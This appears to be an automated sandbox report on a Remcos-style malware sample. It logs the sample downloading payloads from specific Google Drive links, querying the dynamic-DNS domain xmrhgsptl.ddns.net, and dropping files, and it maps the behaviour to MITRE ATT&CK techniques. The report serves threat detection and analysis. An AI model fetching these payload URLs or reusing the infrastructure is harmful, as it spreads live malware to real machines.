Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Places-Ios-Sdk, X-Android-Package, X-Android-Cert, X-Places-Android-Sdk, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context, X-AppInt-Credentials
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 419428
Last-Modified: Sun, 17 Nov 2024 20:22:54 GMT
X-GUploader-UploadID: AFiumC7J3EipCO60qMqEwveW9hCYGdQ3txzhSd5J0xBeZXELucVEo74nZXRgw1SRzuRwzb69-1CG26cmoA
Date: Mon, 18 Nov 2024 00:08:42 GMT
Expires: Mon, 18 Nov 2024 00:08:42 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=r91FJA==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

196.249.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.249.167.52.in-addr.arpa

IN PTR

Response
DNS

1.180.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.180.250.142.in-addr.arpa

IN PTR

Response

1.180.250.142.in-addr.arpa

IN PTR

lhr25s32-in-f11e100net
DNS

71.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

71.159.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

154.239.44.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

154.239.44.20.in-addr.arpa

IN PTR

Response
DNS

217.106.137.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.106.137.52.in-addr.arpa

IN PTR

Response
GET

https://drive.google.com/uc?export=download&id=1yk9eA5sB-zKnMDLC10LHLYzOxVXHZJsy

msiexec.exe

Remote address:

142.250.187.206:443

Request

GET /uc?export=download&id=1yk9eA5sB-zKnMDLC10LHLYzOxVXHZJsy HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: drive.google.com
Cache-Control: no-cache

Response

HTTP/1.1 303 See Other

Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 18 Nov 2024 00:09:11 GMT
Location: https://drive.usercontent.google.com/download?id=1yk9eA5sB-zKnMDLC10LHLYzOxVXHZJsy&export=download
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-tNLi63hLdCyX8NhldCQdRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

56.163.245.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.163.245.4.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
DNS

c.pki.goog

msiexec.exe

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

216.58.201.99
GET

http://c.pki.goog/r/r1.crl

msiexec.exe

Remote address:

216.58.201.99:80

Request

GET /r/r1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 854
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Mon, 18 Nov 2024 00:02:17 GMT
Expires: Mon, 18 Nov 2024 00:52:17 GMT
Cache-Control: public, max-age=3000
Age: 413
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
DNS

o.pki.goog

msiexec.exe

Remote address:

8.8.8.8:53

Request

o.pki.goog

IN A

Response

o.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

216.58.201.99
GET

http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEGoFYJ0C3qQCbRh5xcgwPQ%3D

msiexec.exe

Remote address:

216.58.201.99:80

Request

GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEGoFYJ0C3qQCbRh5xcgwPQ%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: o.pki.goog

Response

HTTP/1.1 200 OK

Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Sun, 17 Nov 2024 23:56:16 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 774
GET

http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDHA1yyGqTiRQmAB36tPEBH

msiexec.exe

Remote address:

216.58.201.99:80

Request

GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDHA1yyGqTiRQmAB36tPEBH HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: o.pki.goog

Response

HTTP/1.1 200 OK

Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Sun, 17 Nov 2024 23:52:37 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 994
GET

https://drive.usercontent.google.com/download?id=1yk9eA5sB-zKnMDLC10LHLYzOxVXHZJsy&export=download

msiexec.exe

Remote address:

142.250.180.1:443

Request

GET /download?id=1yk9eA5sB-zKnMDLC10LHLYzOxVXHZJsy&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="gaKRpbwIdlzGUTAY78.bin"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Places-Ios-Sdk, X-Android-Package, X-Android-Cert, X-Places-Android-Sdk, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context, X-AppInt-Credentials
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 493120
Last-Modified: Sun, 17 Nov 2024 20:17:35 GMT
X-GUploader-UploadID: AFiumC4IlW_GWq5xKX_t7mVuDQfmhk8Khdr580PRsuk6JG5mTTZlXhnX3NK7J-19BSCiermfB4t4zXaD3Q
Date: Mon, 18 Nov 2024 00:09:13 GMT
Expires: Mon, 18 Nov 2024 00:09:13 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=Omh6Rg==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

99.201.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.201.58.216.in-addr.arpa

IN PTR

Response

99.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f31e100net

99.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f99�G

99.201.58.216.in-addr.arpa

IN PTR

lhr48s48-in-f3�G
DNS

xmrhgsptl.ddns.net

msiexec.exe

Remote address:

8.8.8.8:53

Request

xmrhgsptl.ddns.net

IN A

Response

xmrhgsptl.ddns.net

IN A

0.0.0.0

142.250.187.206:443

https://drive.google.com/uc?export=download&id=17hiulZxJ-xvayYWQQchBQYwtGcKFyvIV

tls, http

powershell.exe

917 B
8.9kB
9
11

HTTP Request

GET https://drive.google.com/uc?export=download&id=17hiulZxJ-xvayYWQQchBQYwtGcKFyvIV

HTTP Response

303
142.250.180.1:443

https://drive.usercontent.google.com/download?id=17hiulZxJ-xvayYWQQchBQYwtGcKFyvIV&export=download

tls, http

powershell.exe

8.3kB
451.3kB
168
328

HTTP Request

GET https://drive.usercontent.google.com/download?id=17hiulZxJ-xvayYWQQchBQYwtGcKFyvIV&export=download

HTTP Response

200
142.250.187.206:443

https://drive.google.com/uc?export=download&id=1yk9eA5sB-zKnMDLC10LHLYzOxVXHZJsy

tls, http

msiexec.exe

1.2kB
8.9kB
15
12

HTTP Request

GET https://drive.google.com/uc?export=download&id=1yk9eA5sB-zKnMDLC10LHLYzOxVXHZJsy

HTTP Response

303
216.58.201.99:80

http://c.pki.goog/r/r1.crl

http

msiexec.exe

395 B
1.8kB
6
5

HTTP Request

GET http://c.pki.goog/r/r1.crl

HTTP Response

200
216.58.201.99:80

http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDHA1yyGqTiRQmAB36tPEBH

http

msiexec.exe

830 B
1.6kB
8
5

HTTP Request

GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEGoFYJ0C3qQCbRh5xcgwPQ%3D

HTTP Response

200

HTTP Request

GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDHA1yyGqTiRQmAB36tPEBH

HTTP Response

200
142.250.180.1:443

https://drive.usercontent.google.com/download?id=1yk9eA5sB-zKnMDLC10LHLYzOxVXHZJsy&export=download

tls, http

msiexec.exe

18.4kB
529.0kB
388
385

HTTP Request

GET https://drive.usercontent.google.com/download?id=1yk9eA5sB-zKnMDLC10LHLYzOxVXHZJsy&export=download

HTTP Response

200

8.8.8.8:53

drive.google.com

dns

msiexec.exe

62 B
78 B
1
1

DNS Request

drive.google.com

DNS Response

142.250.187.206
8.8.8.8:53

drive.usercontent.google.com

dns

msiexec.exe

74 B
90 B
1
1

DNS Request

drive.usercontent.google.com

DNS Response

142.250.180.1
8.8.8.8:53

196.249.167.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

196.249.167.52.in-addr.arpa
8.8.8.8:53

1.180.250.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

1.180.250.142.in-addr.arpa
8.8.8.8:53

71.159.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

71.159.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

154.239.44.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

154.239.44.20.in-addr.arpa
8.8.8.8:53

217.106.137.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

217.106.137.52.in-addr.arpa
8.8.8.8:53

56.163.245.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

56.163.245.4.in-addr.arpa
8.8.8.8:53

15.164.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

15.164.165.52.in-addr.arpa
8.8.8.8:53

c.pki.goog

dns

msiexec.exe

56 B
107 B
1
1

DNS Request

c.pki.goog

DNS Response

216.58.201.99
8.8.8.8:53

o.pki.goog

dns

msiexec.exe

56 B
107 B
1
1

DNS Request

o.pki.goog

DNS Response

216.58.201.99
8.8.8.8:53

99.201.58.216.in-addr.arpa

dns

72 B
169 B
1
1

DNS Request

99.201.58.216.in-addr.arpa
8.8.8.8:53

xmrhgsptl.ddns.net

dns

msiexec.exe

64 B
80 B
1
1

DNS Request

xmrhgsptl.ddns.net

DNS Response

0.0.0.0

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
db04151e30c9233e9a273f8c49850b28

SHA1
45d54f393fa1468e2de5b0791ed426ad1a8b9fa7

SHA256
6c254f050a44c8517454d8714b4e8bd957aed5350afc871270a7322a790f7850

SHA512
c2c6c9da6ce7e5eb0df92779a9a2967af14b5c8c4fb3d6c8ccbedd54a57dc24fdb2872eb872378926861ef8b5fbfe3b7f29f17b31d6d9377962f6d99c7ea71cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9c58be6d98809a0ea5149c1ddf3982cc

SHA1
94b7b598571e93803ee068d7d8bb1051d11943de

SHA256
392b5d88a0b6db42b7a45328175a5fb34764f15152eaa0c72a1428d3e4eb2ff7

SHA512
c4606ea7ef50ae8e0d5328da3ad4927fb527793af9d8b5cda4108243a7c0acc8ff6f2686b3c383c42a5f27498e20c1e13b4fe2c1a75dd8938d58ab1b7e157a59

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z0nlust0.j5t.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Dreamers.Lan

Filesize
409KB

MD5
e8e8f70630d0ed255ba5c4c8c8f93357

SHA1
7fd44450794ef2830c908f8ea0fe62759af9ed87

SHA256
ed5fe0a58461eccceabf20e95fe744b74f1455842b3ea325c1f7fa01e0649d0d

SHA512
45a3c10a2282a7d151afa5120ebff15f944fe492e7f51af93dcfc163f06c8f4bd8a4ed90b1ef6d1ca71310951690ed5e12b9175213c72eabf983bde3b3192cf1

Download Submit
memory/1144-46-0x00000000073C0000-0x00000000073E2000-memory.dmp

Filesize
136KB

Download
memory/1144-45-0x0000000007460000-0x00000000074F6000-memory.dmp

Filesize
600KB

Download
memory/1144-49-0x0000000008BD0000-0x000000000BDA3000-memory.dmp

Filesize
49.8MB

Download
memory/1144-47-0x0000000008620000-0x0000000008BC4000-memory.dmp

Filesize
5.6MB

Download
memory/1144-44-0x0000000006750000-0x000000000676A000-memory.dmp

Filesize
104KB

Download
memory/1144-25-0x0000000004C30000-0x0000000004C66000-memory.dmp

Filesize
216KB

Download
memory/1144-26-0x00000000052A0000-0x00000000058C8000-memory.dmp

Filesize
6.2MB

Download
memory/1144-27-0x0000000005900000-0x0000000005922000-memory.dmp

Filesize
136KB

Download
memory/1144-28-0x00000000059A0000-0x0000000005A06000-memory.dmp

Filesize
408KB

Download
memory/1144-29-0x0000000005A80000-0x0000000005AE6000-memory.dmp

Filesize
408KB

Download
memory/1144-39-0x0000000005B70000-0x0000000005EC4000-memory.dmp

Filesize
3.3MB

Download
memory/1144-43-0x00000000079F0000-0x000000000806A000-memory.dmp

Filesize
6.5MB

Download
memory/1144-41-0x00000000061A0000-0x00000000061BE000-memory.dmp

Filesize
120KB

Download
memory/1144-42-0x00000000061E0000-0x000000000622C000-memory.dmp

Filesize
304KB

Download
memory/1456-16-0x00007FFBD1F30000-0x00007FFBD29F1000-memory.dmp

Filesize
10.8MB

Download
memory/1456-24-0x00007FFBD1F30000-0x00007FFBD29F1000-memory.dmp

Filesize
10.8MB

Download
memory/1456-19-0x00007FFBD1F33000-0x00007FFBD1F35000-memory.dmp

Filesize
8KB

Download
memory/1456-4-0x00007FFBD1F33000-0x00007FFBD1F35000-memory.dmp

Filesize
8KB

Download
memory/1456-21-0x00007FFBD1F30000-0x00007FFBD29F1000-memory.dmp

Filesize
10.8MB

Download
memory/1456-15-0x00007FFBD1F30000-0x00007FFBD29F1000-memory.dmp

Filesize
10.8MB

Download
memory/1456-20-0x00007FFBD1F30000-0x00007FFBD29F1000-memory.dmp

Filesize
10.8MB

Download
memory/1456-14-0x0000022BAE700000-0x0000022BAE722000-memory.dmp

Filesize
136KB

Download
memory/5020-62-0x0000000000F10000-0x0000000002164000-memory.dmp

Filesize
18.3MB

Download
memory/5020-63-0x0000000000F10000-0x0000000002164000-memory.dmp

Filesize
18.3MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.